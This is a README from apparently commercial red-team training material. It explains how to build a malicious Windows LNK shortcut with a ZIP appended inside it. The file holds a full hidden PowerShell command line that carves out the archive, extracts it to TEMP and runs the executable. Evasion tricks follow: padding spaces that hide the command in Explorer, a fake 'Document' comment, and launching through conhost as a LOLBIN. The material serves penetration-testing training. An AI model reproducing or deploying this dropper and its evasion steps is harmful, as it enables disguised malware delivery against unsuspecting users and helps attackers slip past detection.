## embed-zip LNK ### Generate your own LNK 1. Create a ZIP archive containing `updater.exe` 2. Produce the LNK with: ``` cmd> gen-embed-zip.exe updater.zip updater.lnk ``` ### How it works The `embed-zip` approach works by: 1. Creating LNK to `C:\Windows\System32\cmd.exe` with the following parameter: ``` /c powershell -windowstyle hidden $nagenciesp = dir *.lnk ^| ? {$_.length -eq 00391272} ^| select -ExpandProperty FullName;$utulsag = [system.io.file]::ReadAllBytes($nagenciesp);$rbanx = '%TEMP% mp' + (Get-Random) + '.zip';$rbanx = [Environment]::ExpandEnvironmentVariables($rbanx);$xsmilek = [System.IO.Path]::GetDirectoryName($rbanx);[System.IO.File]::WriteAllBytes($rbanx, $utulsag[ 3186..($utulsag.length)]);cd $xsmilek;Expand-Archive -Path $rbanx -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;del -Path $rbanx -EA SilentlyContinue -Force ^| Out-Null;^& .\Autoruns64.exe ``` 2. Creating a ZIP archive containing SysInternals Autoruns64.zip 3. Appending that ZIP to the LNK file 4. Overwriting LNK file bytes by adjusting two offsets: - `{$_.length -eq 00391272}` this part has to be adjusted with the _current_ size of the LNK (after appending ZIP) - `$utulsag[ 3186..($utulsag.length)])` the `3186` must be adjusted with the position of the very first ZIP byte (`50 4B | PK`) ### Evasion + LOLBIN To make the LNK a little stealthier and decrease detection chances, we might introduce three tricks: 1. Prepend the command line with 512 spaces - to overflow Explorer's properties window text box 2. Add following LNK comment: ``` Type: Document Size: 626.35 KB Date modified: 2022-10-12 ``` (mind the `\n` added to the comment, the LineFeed has to be present in binary structure) 3. Run CMD through a LOLBIN such as: ``` C:\Windows\System32\conhost.exe conhost conhost conhost conhost conhost conhost cmd /c notepad ``` ## Copyrights > > Copyright (C) Binary-Offensive.com Mariusz Banach - All Rights Reserved > Unauthorized copying of this file, via any medium is strictly prohibited. > > This file/directory was part of Modern Initial Access and Evasion Tactics training > delivered by binary-offensive.com and was provided as supplemental material. > > Authored by Mariusz Banach , @mariuszbit / mgeeky >